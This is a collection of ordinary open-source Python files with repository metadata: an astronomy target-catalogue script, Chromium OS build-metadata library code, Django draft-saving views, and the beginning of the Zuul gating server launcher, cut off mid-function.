props.append( (3005, 'EB_Shporer'))
#
combined = []
qm = QueryK2ByTgtId()
for p in props:
print "Getting %s" %(p[1])
text = qm.queryProposal(p[0])
data = qm.parseResults(text)
data = appendCol(data[1:, :], 'Proposal')
data[:, 'Proposal'] = p[1]
combined.append(data)
cat = np.concatenate(combined)
idx= np.unique(cat[:,0], return_index=True)[1]
cat = cat[idx]
cat = nca.Nca(cat)
cat.setLookup(1, data.lookup[1])
return cat
import tools
def printCat(cat):
text = []
for row in cat:
line = " ".join(row)
text.append(line)
headerStr="Example K2C3 stars for algortihm testing"
colNames = cat.lookup[1]
hdr = tools.createHeader(headerStr, columnNames=colNames)
fp = open("K2C3cat.txt", 'w')
fp.write("\n".join(hdr))
fp.write("\n")
fp.write("\n".join(tools.respace(text)))
fp.close()
def appendCol(data, name):
nr, nc = data.shape
nc +=1
newCol = np.atleast_2d(data[:,0].asarray()).transpose()
newData = np.hstack( (data.asarray(), newCol))
lookup = data.lookup
lookup[1].append(name)
return nca.Nca(newData, lookup)
| {
"content_hash": "7ae0d3d08acc5c0e239b1d2f873250b6",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 84,
"avg_line_length": 26.11764705882353,
"alnum_prop": 0.6052123552123552,
"repo_name": "barentsen/dave",
"id": "d186b8bd9718fc41edf307af0e9667da25c99728",
"size": "3132",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "exampleTargets/C3/getTargets.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "28133"
},
{
"name": "C++",
"bytes": "94566"
},
{
"name": "Fortran",
"bytes": "326733"
},
{
"name": "Jupyter Notebook",
"bytes": "826626"
},
{
"name": "M",
"bytes": "239"
},
{
"name": "MATLAB",
"bytes": "696786"
},
{
"name": "Makefile",
"bytes": "257"
},
{
"name": "Python",
"bytes": "966118"
},
{
"name": "TeX",
"bytes": "7449"
}
],
"symlink_target": ""
} |
"""Module containing class for recording metadata about a run."""
import collections
import datetime
import json
import logging
import math
import multiprocessing
import os
import re
import time
from chromite.cbuildbot import archive_lib
from chromite.cbuildbot import cbuildbot_config
from chromite.cbuildbot import results_lib
from chromite.cbuildbot import constants
from chromite.lib import cros_build_lib
from chromite.lib import gs
from chromite.lib import parallel
# Number of parallel processes used when uploading/downloading GS files.
MAX_PARALLEL = 40
ARCHIVE_ROOT = 'gs://chromeos-image-archive/%(target)s'
# NOTE: gsutil 3.42 has a bug where '/' is ignored in this context unless it
# is listed twice. So we list it twice here for now.
METADATA_URL_GLOB = os.path.join(ARCHIVE_ROOT,
'R%(milestone)s**//metadata.json')
LATEST_URL = os.path.join(ARCHIVE_ROOT, 'LATEST-master')
class LocalBuilderStatus(object):
"""Class for parsing our local build results."""
def __init__(self, general_status, board_status_map):
"""Initialize a LocalBuilderStatus object.
Args:
general_status: The status of general (not board-specific) steps. This is
set to FINAL_STATUS_FAILED if any general steps failed.
board_status_map: A dictionary mapping boards to the status of the
board-specific steps.
"""
self.general_status = general_status
self.board_status_map = board_status_map
@classmethod
def Get(cls):
"""Create a LocalBuilderStatus object containing our current results."""
board_status_map = {}
general_status = constants.FINAL_STATUS_PASSED
for entry in results_lib.Results.Get():
passed = entry.result in results_lib.Results.NON_FAILURE_TYPES
if entry.board:
if passed:
board_status_map.setdefault(entry.board,
constants.FINAL_STATUS_PASSED)
else:
board_status_map[entry.board] = constants.FINAL_STATUS_FAILED
elif not passed:
general_status = constants.FINAL_STATUS_FAILED
return cls(general_status, board_status_map)
def GetBuilderStatus(self, config_name):
"""Get the status of the given |config_name| from |board_status_map|.
A builder is marked as passed if all general steps passed and all steps
specific to its boards passed. If a board did not show up in the logs
at all (e.g. because the builder aborted before it got to this board),
we consider the builder as failed.
Args:
config_name: The name of the builder we wish to get the status of.
Returns:
Whether the builder passed or failed.
"""
if self.general_status == constants.FINAL_STATUS_FAILED:
return self.general_status
for board in cbuildbot_config.config[config_name].boards:
status = self.board_status_map.get(board, constants.FINAL_STATUS_FAILED)
if status == constants.FINAL_STATUS_FAILED:
return status
return constants.FINAL_STATUS_PASSED
class CBuildbotMetadata(object):
"""Class for recording metadata about a run."""
def __init__(self, metadata_dict=None, multiprocess_manager=None):
"""Constructor for CBuildbotMetadata.
Args:
metadata_dict: Optional dictionary containing initial metadata,
as returned by loading metadata from json.
multiprocess_manager: Optional multiprocess.Manager instance. If
supplied, the metadata instance will use
multiprocess containers so that its state
is correctly synced across processes.
"""
super(CBuildbotMetadata, self).__init__()
if multiprocess_manager:
self._metadata_dict = multiprocess_manager.dict()
self._cl_action_list = multiprocess_manager.list()
else:
self._metadata_dict = {}
self._cl_action_list = []
if metadata_dict:
self.UpdateWithDict(metadata_dict)
def UpdateWithDict(self, metadata_dict):
"""Update metadata dictionary with values supplied in |metadata_dict|
This method is effectively the inverse of GetDict. Existing key-values
in metadata will be overwritten by those supplied in |metadata_dict|,
with the exception of the cl_actions list which will be extended with
the contents (if any) of the supplied dict's cl_actions list.
Args:
metadata_dict: A dictionary of key-value pairs to be added this
metadata instance. Keys should be strings, values
should be json-able.
Returns:
self
"""
# This is effectively the inverse of the dictionary construction in GetDict,
# to reconstruct the correct internal representation of a metadata
# object.
metadata_dict = metadata_dict.copy()
cl_action_list = metadata_dict.pop('cl_actions', None)
self._metadata_dict.update(metadata_dict)
if cl_action_list:
self._cl_action_list.extend(cl_action_list)
return self
def UpdateKeyDictWithDict(self, key, key_metadata_dict):
"""Update metadata for the given key with values supplied in |metadata_dict|
This method merges the dictionary for the given key with the given key
metadata dictionary (allowing them to be effectively updated from any
stage). This may not be multiprocess safe if two processes attempt to
modify a dictionary with the same key.
Args:
key: The key name (e.g. 'version' or 'status')
key_metadata_dict: A dictionary of key-value pairs to be added this
metadata key. Keys should be strings, values
should be json-able.
Returns:
self
"""
# If the key already exists, then use its dictionary
metadata_dict = self._metadata_dict.copy()
update_dict = metadata_dict.pop(key, {})
update_dict.update(key_metadata_dict)
self._metadata_dict[key] = update_dict
return self
def GetDict(self):
"""Returns a dictionary representation of metadata."""
# CL actions are be stored in self._cl_action_list instead of
# in self._metadata_dict['cl_actions'], because _cl_action_list
# is potentially a multiprocess.lis. So, _cl_action_list needs to
# be copied into a normal list.
temp = self._metadata_dict.copy()
temp['cl_actions'] = list(self._cl_action_list)
return temp
def GetJSON(self):
"""Return a JSON string representation of metadata."""
return json.dumps(self.GetDict())
def RecordCLAction(self, change, action, timestamp=None, reason=''):
"""Record an action that was taken on a CL, to the metadata.
Args:
change: A GerritPatch object for the change acted on.
action: The action taken, should be one of constants.CL_ACTIONS
timestamp: An integer timestamp such as int(time.time()) at which
the action was taken. Default: Now.
reason: Description of the reason the action was taken. Default: ''
Returns:
self
"""
cl_action = (self._ChangeAsSmallDictionary(change),
action,
timestamp or int(time.time()),
reason or '')
self._cl_action_list.append(cl_action)
return self
@staticmethod
def _ChangeAsSmallDictionary(change):
"""Returns a small dictionary representation of a gerrit change.
Args:
change: A GerritPatch or GerritPatchTuple object.
Returns:
A dictionary of the form {'gerrit_number': change.gerrit_number,
'patch_number': change.patch_number,
'internal': change.internal}
"""
return {'gerrit_number': change.gerrit_number,
'patch_number': change.patch_number,
'internal': change.internal}
@staticmethod
def GetReportMetadataDict(builder_run, get_changes_from_pool,
get_statuses_from_slaves, config=None, stage=None,
final_status=None, sync_instance=None,
completion_instance=None):
"""Return a metadata dictionary summarizing a build.
This method replaces code that used to exist in the ArchivingStageMixin
class from cbuildbot_stage. It contains all the Report-stage-time
metadata construction logic. The logic here is intended to be gradually
refactored out so that the metadata is constructed gradually by the
stages that are responsible for pieces of data, as they run.
Args:
builder_run: BuilderRun instance for this run.
get_changes_from_pool: If True, information about patches in the
sync_instance.pool will be recorded.
get_statuses_from_slaves: If True, status information of slave
builders will be recorded.
config: The build config for this run. Defaults to self._run.config.
stage: The stage name that this metadata file is being uploaded for.
final_status: Whether the build passed or failed. If None, the build
will be treated as still running.
sync_instance: The stage instance that was used for syncing the source
code. This should be a derivative of SyncStage. If None,
the list of commit queue patches will not be included
in the metadata.
completion_instance: The stage instance that was used to wait for slave
completion. Used to add slave build information to
master builder's metadata. If None, no such status
information will be included. It not None, this
should be a derivative of
MasterSlaveSyncCompletionStage.
Returns:
A metadata dictionary suitable to be json-serialized.
"""
config = config or builder_run.config
start_time = results_lib.Results.start_time
current_time = datetime.datetime.now()
start_time_stamp = cros_build_lib.UserDateTimeFormat(timeval=start_time)
current_time_stamp = cros_build_lib.UserDateTimeFormat(timeval=current_time)
duration = '%s' % (current_time - start_time,)
metadata = {
'status': {
'current-time': current_time_stamp,
'status': final_status if final_status else 'running',
'summary': stage or '',
},
'time': {
'start': start_time_stamp,
'finish': current_time_stamp if final_status else '',
'duration': duration,
}
}
metadata['results'] = []
for entry in results_lib.Results.Get():
timestr = datetime.timedelta(seconds=math.ceil(entry.time))
if entry.result in results_lib.Results.NON_FAILURE_TYPES:
status = constants.FINAL_STATUS_PASSED
else:
status = constants.FINAL_STATUS_FAILED
metadata['results'].append({
'name': entry.name,
'status': status,
# The result might be a custom exception.
'summary': str(entry.result),
'duration': '%s' % timestr,
'board': entry.board,
'description': entry.description,
'log': builder_run.ConstructDashboardURL(stage=entry.name),
})
if get_changes_from_pool:
changes = []
pool = sync_instance.pool
for change in pool.changes:
details = {'gerrit_number': change.gerrit_number,
'patch_number': change.patch_number,
'internal': change.internal}
for latest_patchset_only in (False, True):
prefix = '' if latest_patchset_only else 'total_'
for status in (pool.STATUS_FAILED, pool.STATUS_PASSED):
count = pool.GetCLStatusCount(pool.bot, change, status,
latest_patchset_only)
details['%s%s' % (prefix, status.lower())] = count
changes.append(details)
metadata['changes'] = changes
# If we were a CQ master, then include a summary of the status of slave cq
# builders in metadata
if get_statuses_from_slaves:
statuses = completion_instance.GetSlaveStatuses()
if not statuses:
logging.warning('completion_instance did not have any statuses '
'to report. Will not add slave status to metadata.')
metadata['slave_targets'] = {}
for builder, status in statuses.iteritems():
metadata['slave_targets'][builder] = status.AsFlatDict()
return metadata
# The graphite graphs use seconds since epoch start as time value.
EPOCH_START = datetime.datetime(1970, 1, 1)
# Formats we like for output.
NICE_DATE_FORMAT = '%Y/%m/%d'
NICE_TIME_FORMAT = '%H:%M:%S'
NICE_DATETIME_FORMAT = NICE_DATE_FORMAT + ' ' + NICE_TIME_FORMAT
# TODO(akeshet): Merge this class into CBuildbotMetadata.
class BuildData(object):
"""Class for examining metadata from a prior run.
The raw metadata dict can be accessed at self.metadata_dict or via []
and get() on a BuildData object. Some values from metadata_dict are
also surfaced through the following list of supported properties:
build_number
stages
slaves
chromeos_version
chrome_version
bot_id
status
start_datetime
finish_datetime
start_date_str
start_time_str
start_datetime_str
finish_date_str
finish_time_str
finish_datetime_str
runtime_seconds
runtime_minutes
epoch_time_seconds
count_changes
run_date
failure_message
"""
__slots__ = (
'gathered_dict', # Dict with gathered data (sheets/carbon version).
'gathered_url', # URL to metadata.json.gathered location in GS.
'metadata_dict', # Dict representing metadata data from JSON.
'metadata_url', # URL to metadata.json location in GS.
)
# Regexp for parsing datetimes as stored in metadata.json. Example text:
# Fri, 14 Feb 2014 17:00:49 -0800 (PST)
DATETIME_RE = re.compile(r'^(.+)\s-\d\d\d\d\s\(P\wT\)$')
SHEETS_VER_KEY = 'sheets_version'
CARBON_VER_KEY = 'carbon_version'
@staticmethod
def ReadMetadataURLs(urls, gs_ctx=None, exclude_running=True,
get_sheets_version=False):
"""Read a list of metadata.json URLs and return BuildData objects.
Args:
urls: List of metadata.json GS URLs.
gs_ctx: A GSContext object to use. If not provided gs.GSContext will
be called to get a GSContext to use.
exclude_running: If True the metadata for builds that are still running
will be skipped.
get_sheets_version: Whether to try to figure out the last sheets version
and the last carbon version that was gathered. This requires an extra
gsutil request and is only needed if you are writing the metadata to
to the Google Sheets spreadsheet.
Returns:
List of BuildData objects.
"""
gs_ctx = gs_ctx or gs.GSContext()
cros_build_lib.Info('Reading %d metadata URLs using %d processes now.',
len(urls), MAX_PARALLEL)
build_data_per_url = {}
def _ReadMetadataURL(url):
# Read the metadata.json URL and parse json into a dict.
metadata_dict = json.loads(gs_ctx.Cat(url, print_cmd=False).output)
# Read the file next to url which indicates whether the metadata has
# been gathered before, and with what stats version.
if get_sheets_version:
gathered_dict = {}
gathered_url = url + '.gathered'
if gs_ctx.Exists(gathered_url, print_cmd=False):
gathered_dict = json.loads(gs_ctx.Cat(gathered_url,
print_cmd=False).output)
sheets_version = gathered_dict.get(BuildData.SHEETS_VER_KEY)
carbon_version = gathered_dict.get(BuildData.CARBON_VER_KEY)
else:
sheets_version, carbon_version = None, None
bd = BuildData(url, metadata_dict, sheets_version=sheets_version,
carbon_version=carbon_version)
if bd.build_number is None:
cros_build_lib.Warning('Metadata at %s was missing build number.',
url)
# metadata.json can be missing a build number if the build died before
# ReportBuildStartStage. See crbug.com/369748. As a workaround so that
# gather_builder_stats can still record these builds in the spreadsheet
# try to infer the build number from the file's url.
m = re.match(r'.*-b([0-9]*)/.*', url)
if m:
inferred_number = int(m.groups()[0])
cros_build_lib.Warning('Inferred build number %d from metadata url.',
inferred_number)
bd.metadata_dict['build-number'] = inferred_number
if not (sheets_version is None and carbon_version is None):
cros_build_lib.Debug('Read %s:\n'
' build_number=%d, sheets v%d, carbon v%d', url,
bd.build_number, sheets_version, carbon_version)
else:
cros_build_lib.Debug('Read %s:\n build_number=%d, ungathered',
url, bd.build_number)
build_data_per_url[url] = bd
with multiprocessing.Manager() as manager:
build_data_per_url = manager.dict()
parallel.RunTasksInProcessPool(_ReadMetadataURL, [[url] for url in urls],
processes=MAX_PARALLEL)
builds = [build_data_per_url[url] for url in urls]
if exclude_running:
builds = [b for b in builds if b.status != 'running']
return builds
@staticmethod
def MarkBuildsGathered(builds, sheets_version, carbon_version, gs_ctx=None):
"""Mark specified |builds| as processed for the given stats versions.
Args:
builds: List of BuildData objects.
sheets_version: The Google Sheets version these builds are now processed
for.
carbon_version: The Carbon/Graphite version these builds are now
processed for.
gs_ctx: A GSContext object to use, if set.
"""
gs_ctx = gs_ctx or gs.GSContext()
# Filter for builds that were not already on these versions.
builds = [b for b in builds
if b.sheets_version != sheets_version or
b.carbon_version != carbon_version]
if builds:
log_ver_str = 'Sheets v%d, Carbon v%d' % (sheets_version, carbon_version)
cros_build_lib.Info('Marking %d builds gathered (for %s) using %d'
' processes now.', len(builds), log_ver_str,
MAX_PARALLEL)
def _MarkGathered(build):
build.MarkGathered(sheets_version, carbon_version)
json_text = json.dumps(build.gathered_dict.copy())
gs_ctx.Copy('-', build.gathered_url, input=json_text, print_cmd=False)
cros_build_lib.Debug('Marked build_number %d processed for %s.',
build.build_number, log_ver_str)
inputs = [[build] for build in builds]
parallel.RunTasksInProcessPool(_MarkGathered, inputs,
processes=MAX_PARALLEL)
def __init__(self, metadata_url, metadata_dict, carbon_version=None,
sheets_version=None):
self.metadata_url = metadata_url
self.metadata_dict = metadata_dict
# If a stats version is not specified default to -1 so that the initial
# version (version 0) will be considered "newer".
self.gathered_url = metadata_url + '.gathered'
self.gathered_dict = {
self.CARBON_VER_KEY: -1 if carbon_version is None else carbon_version,
self.SHEETS_VER_KEY: -1 if sheets_version is None else sheets_version,
}
def MarkGathered(self, sheets_version, carbon_version):
"""Mark this build as processed for the given stats versions."""
self.gathered_dict[self.SHEETS_VER_KEY] = sheets_version
self.gathered_dict[self.CARBON_VER_KEY] = carbon_version
def __getitem__(self, key):
"""Relay dict-like access to self.metadata_dict."""
return self.metadata_dict[key]
def get(self, key, default=None):
"""Relay dict-like access to self.metadata_dict."""
return self.metadata_dict.get(key, default)
@property
def sheets_version(self):
return self.gathered_dict[self.SHEETS_VER_KEY]
@property
def carbon_version(self):
return self.gathered_dict[self.CARBON_VER_KEY]
@property
def build_number(self):
try:
return int(self['build-number'])
except KeyError:
return None
@property
def stages(self):
return self['results']
@property
def slaves(self):
return self.get('slave_targets', {})
@property
def chromeos_version(self):
try:
return self['version']['full']
except KeyError:
return None
@property
def chrome_version(self):
try:
return self['version']['chrome']
except KeyError:
return None
@property
def bot_id(self):
return self['bot-config']
@property
def status(self):
return self.get('status', {}).get('status', None)
@classmethod
def _ToDatetime(cls, time_str):
match = cls.DATETIME_RE.search(time_str)
if match:
return datetime.datetime.strptime(match.group(1), '%a, %d %b %Y %H:%M:%S')
else:
raise ValueError('Unexpected metadata datetime format: %s' % time_str)
@property
def start_datetime(self):
return self._ToDatetime(self['time']['start'])
@property
def finish_datetime(self):
return self._ToDatetime(self['time']['finish'])
@property
def start_date_str(self):
return self.start_datetime.strftime(NICE_DATE_FORMAT)
@property
def start_time_str(self):
return self.start_datetime.strftime(NICE_TIME_FORMAT)
@property
def start_datetime_str(self):
return self.start_datetime.strftime(NICE_DATETIME_FORMAT)
@property
def finish_date_str(self):
return self.finish_datetime.strftime(NICE_DATE_FORMAT)
@property
def finish_time_str(self):
return self.finish_datetime.strftime(NICE_TIME_FORMAT)
@property
def finish_datetime_str(self):
return self.finish_datetime.strftime(NICE_DATETIME_FORMAT)
@property
def failure_message(self):
mapping = {}
# Dedup the messages from the slaves.
for slave in self.GetFailedSlaves():
message = self.slaves[slave]['reason']
mapping[message] = mapping.get(message, []) + [slave]
message_list = []
for message, slaves in mapping.iteritems():
if len(slaves) >= 6:
# Do not print all the names when there are more than 6 (an
# arbitrary number) builders.
message_list.append('%d buliders: %s' % (len(slaves), message))
else:
message_list.append('%s: %s' % (','.join(slaves), message))
return ' | '.join(message_list)
def GetChangelistsStr(self):
cl_strs = []
for cl_dict in self.metadata_dict['changes']:
cl_strs.append('%s%s:%s' %
('*' if cl_dict['internal'] == 'true' else '',
cl_dict['gerrit_number'], cl_dict['patch_number']))
return ' '.join(cl_strs)
def GetFailedStages(self, with_urls=False):
"""Get names of all failed stages, optionally with URLs for each.
Args:
with_urls: If True then also return URLs. See Returns.
Returns:
If with_urls is False, return list of stage names. Otherwise, return list
of tuples (stage name, stage URL).
"""
def _Failed(stage):
# This can be more discerning in the future, such as for optional stages.
return stage['status'] == 'failed'
if with_urls:
# The "log" url includes "/logs/stdio" on the end. Strip that off.
return [(s['name'], os.path.dirname(os.path.dirname(s['log'])))
for s in self.stages if _Failed(s)]
else:
return [s['name'] for s in self.stages if _Failed(s)]
def GetFailedSlaves(self, with_urls=False):
def _Failed(slave):
return slave['status'] == 'fail'
# Older metadata has no slave_targets entry.
slaves = self.slaves
if with_urls:
return [(name, slave['dashboard_url'])
for name, slave in slaves.iteritems() if _Failed(slave)]
else:
return [name for name, slave in slaves.iteritems() if _Failed(slave)]
return []
@property
def runtime_seconds(self):
return (self.finish_datetime - self.start_datetime).seconds
@property
def runtime_minutes(self):
return self.runtime_seconds / 60
@property
def epoch_time_seconds(self):
# End time seconds since 1/1/1970, for some reason.
return int((self.finish_datetime - EPOCH_START).total_seconds())
@property
def patches(self):
return [GerritPatchTuple(gerrit_number=change['gerrit_number'],
patch_number=change['patch_number'],
internal=change['internal'])
for change in self.metadata_dict.get('changes', [])]
@property
def count_changes(self):
if not self.metadata_dict.get('changes', None):
return 0
return len(self.metadata_dict['changes'])
@property
def run_date(self):
return self.finish_datetime.strftime('%d.%m.%Y')
def Passed(self):
"""Return True if this represents a successful run."""
return 'passed' == self.metadata_dict['status']['status'].strip()
def FindLatestFullVersion(builder, version):
"""Find the latest full version number built by |builder| on |version|.
Args:
builder: Builder to load information from. E.g. daisy-release
version: Version that we are interested in. E.g. 5602.0.0
Returns:
The latest corresponding full version number, including milestone prefix.
E.g. R35-5602.0.0. For some builders, this may also include a -rcN or
-bNNNN suffix.
"""
gs_ctx = gs.GSContext()
config = cbuildbot_config.config[builder]
base_url = archive_lib.GetBaseUploadURI(config)
latest_file_url = os.path.join(base_url, 'LATEST-%s' % version)
try:
return gs_ctx.Cat(latest_file_url).output.strip()
except gs.GSNoSuchKey:
return None
def GetBuildMetadata(builder, full_version):
"""Fetch the metadata.json object for |builder| and |full_version|.
Args:
builder: Builder to load information from. E.g. daisy-release
full_version: Version that we are interested in, including milestone
prefix. E.g. R35-5602.0.0. For some builders, this may also include a
-rcN or -bNNNN suffix.
Returns:
A newly created CBuildbotMetadata object with the metadata from the given
|builder| and |full_version|.
"""
gs_ctx = gs.GSContext()
config = cbuildbot_config.config[builder]
base_url = archive_lib.GetBaseUploadURI(config)
try:
archive_url = os.path.join(base_url, full_version)
metadata_url = os.path.join(archive_url, constants.METADATA_JSON)
output = gs_ctx.Cat(metadata_url).output
return CBuildbotMetadata(json.loads(output))
except gs.GSNoSuchKey:
return None
class MetadataException(Exception):
"""Base exception class for exceptions in this module."""
class GetMilestoneError(MetadataException):
"""Base exception class for exceptions in this module."""
def GetLatestMilestone():
"""Get the latest milestone from CQ Master LATEST-master file."""
# Use CQ Master target to get latest milestone.
latest_url = LATEST_URL % {'target': constants.CQ_MASTER}
gs_ctx = gs.GSContext()
cros_build_lib.Info('Getting latest milestone from %s', latest_url)
try:
content = gs_ctx.Cat(latest_url).output.strip()
# Expected syntax is like the following: "R35-1234.5.6-rc7".
assert content.startswith('R')
milestone = content.split('-')[0][1:]
cros_build_lib.Info('Latest milestone determined to be: %s', milestone)
return int(milestone)
except gs.GSNoSuchKey:
raise GetMilestoneError('LATEST file missing: %s' % latest_url)
def GetMetadataURLsSince(target, start_date):
"""Get metadata.json URLs for |target| since |start_date|.
The modified time of the GS files is used to compare with start_date, so
the completion date of the builder run is what is important here.
Args:
target: Builder target name.
start_date: datetime.date object.
Returns:
Metadata urls for runs found.
"""
urls = []
milestone = GetLatestMilestone()
gs_ctx = gs.GSContext()
while True:
base_url = METADATA_URL_GLOB % {'target': target, 'milestone': milestone}
cros_build_lib.Info('Getting %s builds for R%d from "%s"',
target, milestone, base_url)
try:
# Get GS URLs as tuples (url, size, modified datetime). We want the
# datetimes to quickly know when we are done collecting URLs.
url_details = gs_ctx.LSWithDetails(base_url)
except gs.GSNoSuchKey:
# We ran out of metadata to collect. Stop searching back in time.
cros_build_lib.Info('No %s builds found for $%d. I will not continue'
' search to older milestones.', target, milestone)
break
# Sort by timestamp.
url_details = sorted(url_details, key=lambda x: x[2], reverse=True)
# See if we have gone far enough back by checking datetime of oldest URL
# in the current batch.
if url_details[-1][2].date() < start_date:
# We want a subset of these URLs, then we are done.
urls.extend([url for (url, _size, dt) in url_details
if dt.date() >= start_date])
break
else:
# Accept all these URLs, then continue on to the next milestone.
urls.extend([url for (url, _size, _dt) in url_details])
milestone -= 1
cros_build_lib.Info('Continuing on to R%d.', milestone)
return urls
GerritPatchTuple = collections.namedtuple('GerritPatchTuple',
'gerrit_number patch_number internal')
GerritChangeTuple = collections.namedtuple('GerritChangeTuple',
'gerrit_number internal')
CLActionTuple = collections.namedtuple('CLActionTuple',
'change action timestamp reason')
CLActionWithBuildTuple = collections.namedtuple('CLActionWithBuildTuple',
'change action timestamp '
'reason bot_type build')
| {
"content_hash": "b5c32bcfb469e0739db3a063e2c79a08",
"timestamp": "",
"source": "github",
"line_count": 836,
"max_line_length": 80,
"avg_line_length": 36.11722488038278,
"alnum_prop": 0.6469828442736968,
"repo_name": "chadversary/chromiumos.chromite",
"id": "cdeb6a0f47a60f8004d87bad444babaeab3aecd5",
"size": "30364",
"binary": false,
"copies": "1",
"ref": "refs/heads/fix-repo-mirror",
"path": "cbuildbot/metadata_lib.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "85"
},
{
"name": "Python",
"bytes": "3652882"
},
{
"name": "Shell",
"bytes": "24031"
}
],
"symlink_target": ""
} |
from django.shortcuts import get_object_or_404
from django.views.decorators.http import require_POST, require_GET
from django.http import HttpResponse, HttpResponseRedirect
from django.utils.translation import ugettext_lazy as _
from models import Draft
from django.contrib import messages
@require_POST
def save(request, path):
draft, created = Draft.objects.get_or_create(path=path)
draft.serialized_data = request.POST.urlencode()
draft.save()
messages.add_message(request, messages.INFO, _(u'Draft saved'))
return HttpResponseRedirect('/%s' % path)
@require_GET
def load(request, path):
try:
draft = Draft.objects.get(path=path)
return HttpResponse(draft.serialized_data)
except Draft.DoesNotExist:
return HttpResponse('')
@require_POST
def discard(request, path):
try:
Draft.objects.get(path=path).delete()
messages.add_message(request, messages.INFO, _(u'Draft deleted'))
except Draft.DoesNotExist:
messages.add_message(request, messages.ERROR, _(u'There was no draft corresponding to this document.'))
return HttpResponseRedirect('/%s' % path) | {
"content_hash": "e484dae089f86efe68f46cb50ff5cd33",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 111,
"avg_line_length": 35.9375,
"alnum_prop": 0.7217391304347827,
"repo_name": "platypus-creation/django-draft",
"id": "ad377d84a91f6f70a5269ef1dac4d7387273e5bc",
"size": "1150",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "draft/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "3720"
},
{
"name": "Python",
"bytes": "3899"
}
],
"symlink_target": ""
} |
import argparse
import ConfigParser
import daemon
import extras
# as of python-daemon 1.6 it doesn't bundle pidlockfile anymore
# instead it depends on lockfile-0.9.1 which uses pidfile.
pid_file_module = extras.try_imports(['daemon.pidlockfile', 'daemon.pidfile'])
import logging
import logging.config
import os
import sys
import signal
import traceback
# No zuul imports here because they pull in paramiko which must not be
# imported until after the daemonization.
# https://github.com/paramiko/paramiko/issues/59
# Similar situation with gear and statsd.
def stack_dump_handler(signum, frame):
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
log_str = ""
for thread_id, stack_frame in sys._current_frames().items():
log_str += "Thread: %s\n" % thread_id
log_str += "".join(traceback.format_stack(stack_frame))
log = logging.getLogger("zuul.stack_dump")
log.debug(log_str)
signal.signal(signal.SIGUSR2, stack_dump_handler)
class Server(object):
def __init__(self):
self.args = None
self.config = None
self.gear_server_pid = None
def parse_arguments(self):
parser = argparse.ArgumentParser(description='Project gating system.')
parser.add_argument('-c', dest='config',
help='specify the config file')
parser.add_argument('-l', dest='layout',
help='specify the layout file')
parser.add_argument('-d', dest='nodaemon', action='store_true',
help='do not run as a daemon')
parser.add_argument('-t', dest='validate', nargs='?', const=True,
metavar='JOB_LIST',
help='validate layout file syntax (optionally '
'providing the path to a file with a list of '
'available job names)')
parser.add_argument('--version', dest='version', action='version',
version=self._get_version(),
help='show zuul version')
self.args = parser.parse_args()
def _get_version(self):
from zuul.version import version_info as zuul_version_info
return "Zuul version: %s" % zuul_version_info.version_string()
def read_config(self):
self.config = ConfigParser.ConfigParser()
if self.args.config:
locations = [self.args.config]
else:
locations = ['/etc/zuul/zuul.conf',
'~/zuul.conf']
for fp in locations:
if os.path.exists(os.path.expanduser(fp)):
self.config.read(os.path.expanduser(fp))
return
raise Exception("Unable to locate config file in %s" % locations)
def setup_logging(self, section, parameter):
if self.config.has_option(section, parameter):
fp = os.path.expanduser(self.config.get(section, parameter))
if not os.path.exists(fp):
raise Exception("Unable to read logging config file at %s" %
fp)
logging.config.fileConfig(fp)
else:
logging.basicConfig(level=logging.DEBUG)
def reconfigure_handler(self, signum, frame):
signal.signal(signal.SIGHUP, signal.SIG_IGN)
self.read_config()
self.setup_logging('zuul', 'log_config')
self.sched.reconfigure(self.config)
signal.signal(signal.SIGHUP, self.reconfigure_handler)
def exit_handler(self, signum, frame):
signal.signal(signal.SIGUSR1, signal.SIG_IGN)
self.sched.exit()
self.sched.join()
self.stop_gear_server()
def term_handler(self, signum, frame):
self.stop_gear_server()
os._exit(0)
def test_config(self, job_list_path):
# See comment at top of file about zuul imports
import zuul.scheduler
import zuul.launcher.gearman
import zuul.trigger.gerrit
import zuul.trigger.messaging
logging.basicConfig(level=logging.DEBUG)
self.sched = zuul.scheduler.Scheduler()
self.sched.registerReporter(None, 'gerrit')
self.sched.registerReporter(None, 'smtp')
self.sched.registerTrigger(None, 'gerrit')
self.sched.registerTrigger(None, 'timer')
self.sched.registerTrigger(None, 'messaging')
layout = self.sched.testConfig(self.config.get('zuul',
'layout_config'))
if not job_list_path:
return False
failure = False
path = os.path.expanduser(job_list_path)
if not os.path.exists(path):
raise Exception("Unable to find job list: %s" % path)
jobs = set()
for line in open(path):
v = line.strip()
if v:
jobs.add(v)
for job in sorted(layout.jobs):
if job not in jobs:
print "Job %s not defined" % job
failure = True
return failure
def start_gear_server(self):
pipe_read, pipe_write = os.pipe()
child_pid = os.fork()
if child_pid == 0:
os.close(pipe_write)
self.setup_logging('gearman_server', 'log_config')
import gear
gear.Server(4730)
# Keep running until the parent dies:
pipe_read = os.fdopen(pipe_read)
pipe_read.read()
os._exit(0)
else:
os.close(pipe_read)
self.gear_server_pid = child_pid
self.gear_pipe_write = pipe_write
def stop_gear_server(self):
if self.gear_server_pid:
os.kill(self.gear_server_pid, signal.SIGKILL)
def main(self):
# See comment at top of file about zuul imports
import zuul.scheduler
import zuul.launcher.gearman
import zuul.reporter.gerrit
import zuul.reporter.smtp
import zuul.trigger.gerrit
import zuul.trigger.messaging
import zuul.trigger.timer
import zuul.webapp
import zuul.rpclistener
if (self.config.has_option('gearman_server', 'start') and
self.config.getboolean('gearman_server', 'start')):
self.start_gear_server()
self.setup_logging('zuul', 'log_config')
self.sched = zuul.scheduler.Scheduler()
gearman = zuul.launcher.gearman.Gearman(self.config, self.sched)
gerrit = zuul.trigger.gerrit.Gerrit(self.config, self.sched)
timer = zuul.trigger.timer.Timer(self.config, self.sched)
messaging = zuul.trigger.messaging.Messaging(self.config, self.sched)
webapp = zuul.webapp.WebApp(self.sched)
rpc = zuul.rpclistener.RPCListener(self.config, self.sched)
gerrit_reporter = zuul.reporter.gerrit.Reporter(gerrit)
smtp_reporter = zuul.reporter.smtp.Reporter(
self.config.get('smtp', 'default_from')
if self.config.has_option('smtp', 'default_from') else 'zuul',
